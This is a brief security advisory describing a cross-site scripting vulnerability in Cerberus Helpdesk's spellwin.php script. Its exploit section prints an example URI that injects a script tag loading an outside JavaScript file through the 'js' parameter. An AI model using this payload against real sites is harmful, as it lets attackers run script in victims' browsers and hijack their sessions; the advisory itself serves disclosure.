Cerberus Helpdesk Spellwin.PHP Cross-Site Scripting Vulnerability

info
discussion
exploit
solution
references

Cerberus Helpdesk Spellwin.PHP Cross-Site Scripting Vulnerability

Attackers can exploit this issue by enticing an unsuspected victim into following a malicious URI.

An example URI has been provided:

http://www.example.com/includes/elements/spellcheck/spellwin.php?pspell_loaded=1&js=<http://www.example2.com/cerberus/includes/elements/spellchec
k/spellwin.php?pspell_loaded=1&js=><script src=JS_FILE></script>